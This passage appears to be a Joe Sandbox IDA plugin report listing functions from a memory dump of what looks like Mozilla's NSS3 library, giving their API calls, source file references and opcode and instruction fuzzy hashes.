Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: TimeUtil$Choice_Decode$GeneralizedTime_
String ID: dLwl
API String ID: 3216063065-3371829678
Opcode ID: bb642fc4dffdf4a2439b972c86720f2b3bbbd1189a530fead316ad96bb47cf45
Instruction ID: a39aa786789fcadf352699ef81f22da84e8da8f7339a0cb4943c738df07e9b05
Opcode Fuzzy Hash: bb642fc4dffdf4a2439b972c86720f2b3bbbd1189a530fead316ad96bb47cf45
Instruction Fuzzy Hash: 3B21A771505359AFCB50CF6ADE14A9B77EDAB84669F400929E848C3A40F330E658C7E2

Function 6C760DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON

Download Yara Rule

APIs

strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6C760BDE), ref: 6C760DCB
strrchr.VCRUNTIME140(00000000,0000005C,?,6C760BDE), ref: 6C760DEA
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6C760BDE), ref: 6C760DFC
PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6C760BDE), ref: 6C760E32

Strings

%s incr => %d (find lib), xrefs: 6C760E2D

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: strrchr$Print_stricmp
String ID: %s incr => %d (find lib)
API String ID: 97259331-2309350800
Opcode ID: 305e507e4c6c491c3b35fb4ec9ab946a534ca960af33628913295ae2d31ebab8
Instruction ID: 241008958fb5cad3926823393d74f962153727fdf850e9276bfb0288546f6175
Opcode Fuzzy Hash: 305e507e4c6c491c3b35fb4ec9ab946a534ca960af33628913295ae2d31ebab8
Instruction Fuzzy Hash: 7E019E726016249FE6209F2ADD49A1773ACDF45B09B0548B9ED09D3E42E761FC1487E1

Function 6C709C60 Relevance: 7.8, APIs: 6, Instructions: 262COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C709CF2
LeaveCriticalSection.KERNEL32(?), ref: 6C709D45
EnterCriticalSection.KERNEL32(?), ref: 6C709D8B
LeaveCriticalSection.KERNEL32(?), ref: 6C709DDE

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 6cd583f870f18f5c0126d055ef7c85a597cc99b8df7ed51f0adc95dd168bc4ca
Instruction ID: c35690794df1b7d6d2550a1f08f591582cc15dfa2d06d4ec3d8dce25ef0f4e21
Opcode Fuzzy Hash: 6cd583f870f18f5c0126d055ef7c85a597cc99b8df7ed51f0adc95dd168bc4ca
Instruction Fuzzy Hash: BFA180B1B041008BEB28AF64DA8AB6E37B5BF9271DF18413DD40647A41DB39F945CBC2

Function 6C791E70 Relevance: 7.7, APIs: 5, Instructions: 207COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3(?), ref: 6C791ECC

Part of subcall function 6C839090: TlsGetValue.KERNEL32 ref: 6C8390AB
Part of subcall function 6C839090: TlsGetValue.KERNEL32 ref: 6C8390C9
Part of subcall function 6C839090: EnterCriticalSection.KERNEL32 ref: 6C8390E5
Part of subcall function 6C839090: TlsGetValue.KERNEL32 ref: 6C839116
Part of subcall function 6C839090: LeaveCriticalSection.KERNEL32 ref: 6C83913F

TlsGetValue.KERNEL32 ref: 6C791EDF
EnterCriticalSection.KERNEL32(?), ref: 6C791EEF
PR_ExitMonitor.NSS3(?), ref: 6C791F37
PR_Unlock.NSS3(?), ref: 6C791F44

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Value$CriticalEnterSection$Monitor$ExitLeaveUnlock
String ID:
API String ID: 3539092540-0
Opcode ID: 173a9dd587af3c9691cab9f61753050904c56a95f0c7c5c476f341da0cbf6c7b
Instruction ID: 2cecd42083a98ca7d25016090d316b88bb1eb7417819042f76041e5b4bfe7cac
Opcode Fuzzy Hash: 173a9dd587af3c9691cab9f61753050904c56a95f0c7c5c476f341da0cbf6c7b
Instruction Fuzzy Hash: C071D0729053019FD710CF24EA44A5AB7F9FF88358F144929E85993B21E731F968CBD2

Function 6C81DD70 Relevance: 7.7, APIs: 5, Instructions: 179COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C81DD8C
LeaveCriticalSection.KERNEL32(00000000), ref: 6C81DDB4
LeaveCriticalSection.KERNEL32(00000000), ref: 6C81DE1B
ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 6C81DE77

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalLeaveSection$ReleaseSemaphoreValue
String ID:
API String ID: 2700453212-0
Opcode ID: f5561e7f15ff85d9c3d86c30a08deb01d4ec2cac37f6a63b5c0ff3a9ae087257
Instruction ID: b42c3aac861e5897e73899b02408d2956605e5885477e05342298cfb006351b9
Opcode Fuzzy Hash: f5561e7f15ff85d9c3d86c30a08deb01d4ec2cac37f6a63b5c0ff3a9ae087257
Instruction Fuzzy Hash: 82715671A0831ACBDB21CF99C68078AB7F4BF49718F25856ED9596BB02D730A941CF90

Function 6C78DFA0 Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

Part of subcall function 6C78AB10: DeleteCriticalSection.KERNEL32(D958E852,6C791397,5B5F5EC0,?,?,6C78B1EE,2404110F,?,?), ref: 6C78AB3C
Part of subcall function 6C78AB10: free.MOZGLUE(D958E836,?,6C78B1EE,2404110F,?,?), ref: 6C78AB49
Part of subcall function 6C78AB10: DeleteCriticalSection.KERNEL32(5D5E6C98), ref: 6C78AB5C
Part of subcall function 6C78AB10: free.MOZGLUE(5D5E6C8C), ref: 6C78AB63
Part of subcall function 6C78AB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6C78AB6F
Part of subcall function 6C78AB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6C78AB76

TlsGetValue.KERNEL32(?,?,6C78B266,6C7915C6,?,?,6C7915C6), ref: 6C78DFDA
EnterCriticalSection.KERNEL32(?,?,?,6C78B266,6C7915C6,?,?,6C7915C6), ref: 6C78DFF3
PK11_IsFriendly.NSS3(?,?,?,?,6C78B266,6C7915C6,?,?,6C7915C6), ref: 6C78E029
PK11_IsLoggedIn.NSS3 ref: 6C78E046

Part of subcall function 6C798F70: PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C78DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C798FAF
Part of subcall function 6C798F70: PR_Now.NSS3(?,?,00000002,?,?,?,6C78DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C798FD1
Part of subcall function 6C798F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C78DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C798FFA
Part of subcall function 6C798F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C78DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C799013
Part of subcall function 6C798F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C78DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C799042
Part of subcall function 6C798F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C78DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C79905A
Part of subcall function 6C798F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C78DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C799073
Part of subcall function 6C798F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C78DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C799111

PR_Unlock.NSS3(?,?,?,?,6C78B266,6C7915C6,?,?,6C7915C6), ref: 6C78E149

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalSection$DeleteEnterK11_UnlockValuefree$FriendlyInternalLoggedSlot
String ID:
API String ID: 4224391822-0
Opcode ID: e7629c8a82592940206bbce67a47953ff29be7633ffdb4239afae807cab8c0d6
Instruction ID: b9a7f33602a31d25a29f80f7124c62e727efea16db92512f1d6c0c8031ee0e40
Opcode Fuzzy Hash: e7629c8a82592940206bbce67a47953ff29be7633ffdb4239afae807cab8c0d6
Instruction Fuzzy Hash: 3A516A74606605CFDB109F29C68876ABBF1BF44318F25887DDA998B741E731E884CBC2

Function 6C79BE90 Relevance: 7.6, APIs: 5, Instructions: 141COMMON

Download Yara Rule

APIs

SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,?,?), ref: 6C79BF06
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C79BF56
PR_SetError.NSS3(FFFFE005,00000000,?,?,6C779F71,?,?,00000000), ref: 6C79BF7F
CERT_DestroyCertificate.NSS3(00000000), ref: 6C79BFA9
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C79C014

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Item_Util$Zfree$CertificateDestroyEncodeError
String ID:
API String ID: 3689625208-0
Opcode ID: 9bd7a2339ced880d5434743556050e515c4ec08c1b390b8a0a99d0cfdf135ed4
Instruction ID: cebca1e272335b5644c8d7ec332d1b43954ab80049202b9962b8e642b4d9c19d
Opcode Fuzzy Hash: 9bd7a2339ced880d5434743556050e515c4ec08c1b390b8a0a99d0cfdf135ed4
Instruction Fuzzy Hash: 3041C975A012059BEB10DE69EE84BBA73B9AF45208F104138E91AD7B41F731E905CBD1

Function 6C76EDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C76EDFD
calloc.MOZGLUE(00000001,00000000), ref: 6C76EE64
PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6C76EECC
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C76EEEB
free.MOZGLUE(?), ref: 6C76EEF6

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ErrorValuecallocfreememcpy
String ID:
API String ID: 3833505462-0
Opcode ID: e1d3a500d944eea0cbc5740427aaea387d59980630367e3f7d82b79b7f906c93
Instruction ID: 119bc0370f1be7aba77b4c4b7939fd09dfbc994d042f511e9bb8f30b8b63665e
Opcode Fuzzy Hash: e1d3a500d944eea0cbc5740427aaea387d59980630367e3f7d82b79b7f906c93
Instruction Fuzzy Hash: D531E4B1A006059BEB209F2ACD44B667BB8FB46318F140539EC5A87E51D731E914CBE1

Function 6C781F10 Relevance: 7.6, APIs: 5, Instructions: 96COMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C781F1C

Part of subcall function 6C7D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7787ED,00000800,6C76EF74,00000000), ref: 6C7D1000
Part of subcall function 6C7D0FF0: PR_NewLock.NSS3(?,00000800,6C76EF74,00000000), ref: 6C7D1016
Part of subcall function 6C7D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7787ED,00000008,?,00000800,6C76EF74,00000000), ref: 6C7D102B

SEC_ASN1EncodeItem_Util.NSS3(00000000,0000000100000017,FFFFFFFF,6C899EBC), ref: 6C781FB8
SEC_ASN1EncodeItem_Util.NSS3(6C899E9C,?,?,6C899E9C), ref: 6C78200A
PR_SetError.NSS3(FFFFE022,00000000), ref: 6C782020

Part of subcall function 6C776A60: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C77AD50,?,?), ref: 6C776A98

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C782030

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$ArenaArena_EncodeItem_$Alloc_ErrorFreeInitLockPoolcalloc
String ID:
API String ID: 1390266749-0
Opcode ID: 18bef36cb91ae3be01cdee46419089c653893d069d06554b95a4d8094f0e6d5a
Instruction ID: 1290139f0248aae00482af066eddbab5096ce3f6049cbad7375d5c794bf46ab4
Opcode Fuzzy Hash: 18bef36cb91ae3be01cdee46419089c653893d069d06554b95a4d8094f0e6d5a
Instruction Fuzzy Hash: C721E675903506ABEB118A19DE48FAA7768FF4131CF140635E93896F80E732E528C7A2

Function 6C771DD0 Relevance: 7.6, APIs: 5, Instructions: 81timeCOMMON

Download Yara Rule

APIs

DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C771E0B
DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C771E24
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C771E3B
PR_SetError.NSS3(FFFFE00B,00000000), ref: 6C771E8A
PR_SetError.NSS3(FFFFE00B,00000000), ref: 6C771EAD

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Error$Choice_DecodeTimeUtil
String ID:
API String ID: 1529734605-0
Opcode ID: fb80b21d24abfee70dffbc92c78620ccd2a2f2b38415dd67b3abdcc45cc33bdd
Instruction ID: 1bfa69c861f04ad5b3e1050cbefb4ca9102c3b7cbf5d61375f63f314a6480922
Opcode Fuzzy Hash: fb80b21d24abfee70dffbc92c78620ccd2a2f2b38415dd67b3abdcc45cc33bdd
Instruction Fuzzy Hash: 58214572E08318A7DB208E68DE51B9B73D89B84329F044638FC2D57B81E730D90887E2

Function 6C881E40 Relevance: 7.6, APIs: 5, Instructions: 75threadCOMMON

Download Yara Rule

APIs

PR_GetCurrentThread.NSS3 ref: 6C881E5C

Part of subcall function 6C839BF0: TlsGetValue.KERNEL32(?,?,?,6C880A75), ref: 6C839C07

PR_Lock.NSS3(00000000), ref: 6C881E75
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C881EAB
PR_GetCurrentThread.NSS3 ref: 6C881ED0
PR_Unlock.NSS3(?), ref: 6C881EE8

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CurrentThread$ErrorLockUnlockValue
String ID:
API String ID: 121300776-0
Opcode ID: 7235205993a0dedc4cf10ee23dd10f8195940d40b9dccaf11b2dfbf3fafa134c
Instruction ID: 8d8990404df2a154b5d98c40fdbaf474ee161ac1a078783cc53090487fa5297f
Opcode Fuzzy Hash: 7235205993a0dedc4cf10ee23dd10f8195940d40b9dccaf11b2dfbf3fafa134c
Instruction Fuzzy Hash: B221A174B16522ABD720CF19DA80A46B7B1FF44718B258A29D8299BF41DB30FC50CBE1

Function 6C7CBE60 Relevance: 7.6, APIs: 5, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C77E708,00000000,00000000,00000004,00000000), ref: 6C7CBE6A

Part of subcall function 6C7D0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7D08B4

SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C7804DC,?), ref: 6C7CBE7E

Part of subcall function 6C7CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C7C8D2D,?,00000000,?), ref: 6C7CFB85
Part of subcall function 6C7CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C7CFBB1

SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C7CBEC2
PR_SetError.NSS3(FFFFE006,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C7804DC,?,?), ref: 6C7CBED7
SECITEM_AllocItem_Util.NSS3(?,?,00000002,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C7CBEEB

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Item_$CopyError$AllocAlloc_ArenaFindTag_memcpy
String ID:
API String ID: 1367977078-0
Opcode ID: f1b67ade3d5cf8085e025b4fa9cc4ed7ec3452d35d0e67ef7d4996e844efd303
Instruction ID: a8075f9f3f6367074b80318d2bf5bae62ec6b83a0aa73a551e5fa6c17a5cd202
Opcode Fuzzy Hash: f1b67ade3d5cf8085e025b4fa9cc4ed7ec3452d35d0e67ef7d4996e844efd303
Instruction Fuzzy Hash: A21104667042576FE7008965AF84F5B776D9B40B58F044135FE0487B52E731F80487E3

Function 6C77AD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(00000000,?,6C773FFF,00000000,?,?,?,?,?,6C771A1C,00000000,00000000), ref: 6C77ADA7

Part of subcall function 6C7D14C0: TlsGetValue.KERNEL32 ref: 6C7D14E0
Part of subcall function 6C7D14C0: EnterCriticalSection.KERNEL32 ref: 6C7D14F5
Part of subcall function 6C7D14C0: PR_Unlock.NSS3 ref: 6C7D150D

PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6C773FFF,00000000,?,?,?,?,?,6C771A1C,00000000,00000000), ref: 6C77ADB4

Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D10F3
Part of subcall function 6C7D10C0: EnterCriticalSection.KERNEL32(?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D110C
Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1141
Part of subcall function 6C7D10C0: PR_Unlock.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1182
Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D119C

SECITEM_CopyItem_Util.NSS3(00000000,?,6C773FFF,?,?,?,?,6C773FFF,00000000,?,?,?,?,?,6C771A1C,00000000), ref: 6C77ADD5

Part of subcall function 6C7CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C7C8D2D,?,00000000,?), ref: 6C7CFB85
Part of subcall function 6C7CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C7CFBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C8994B0,?,?,?,?,?,?,?,?,6C773FFF,00000000,?), ref: 6C77ADEC

Part of subcall function 6C7CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8A18D0,?), ref: 6C7CB095

PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C773FFF), ref: 6C77AE3C

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
String ID:
API String ID: 2372449006-0
Opcode ID: 47eccb3f2b567cbcd8721cd52df6bc351038d912c4a453418890b243cf9afe7e
Instruction ID: 08f92fd602adab4699a702c689c7bc82745d90bd8108ce6f4f550c5f9e486f45
Opcode Fuzzy Hash: 47eccb3f2b567cbcd8721cd52df6bc351038d912c4a453418890b243cf9afe7e
Instruction Fuzzy Hash: 45112961E002095BFB209B699E49BBF73BCDF9126DF044638EC1996741F760E55882F2

Function 6C788FE0 Relevance: 7.6, APIs: 5, Instructions: 63threadCOMMON

Download Yara Rule

APIs

PR_GetThreadPrivate.NSS3(FFFFFFFF,?,6C790710), ref: 6C788FF1
